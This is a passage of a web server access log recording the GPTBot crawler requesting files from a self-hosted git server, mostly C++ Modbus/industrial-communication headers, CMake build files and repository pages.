AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11613] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13313] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11075] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:17:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13351] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:17:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13353] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:17:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11075] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:17:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11617] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11582] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:17:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldBar.png" [Client 74.7.227.38] [Length 314600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" -[17/Feb/2026:17:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 10989] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11902] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" -[17/Feb/2026:17:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11092] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" -[17/Feb/2026:17:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11093] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" -[17/Feb/2026:17:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11036] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14174] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:46:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" -[17/Feb/2026:17:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldBar.ico" -[17/Feb/2026:17:46:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" -[17/Feb/2026:17:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldBar.ico" -[17/Feb/2026:17:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 9792] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" -[17/Feb/2026:17:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" -[17/Feb/2026:17:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 856] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" -[17/Feb/2026:17:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:46:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:46:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14175] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11162] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14180] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14174] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11189] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11162] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 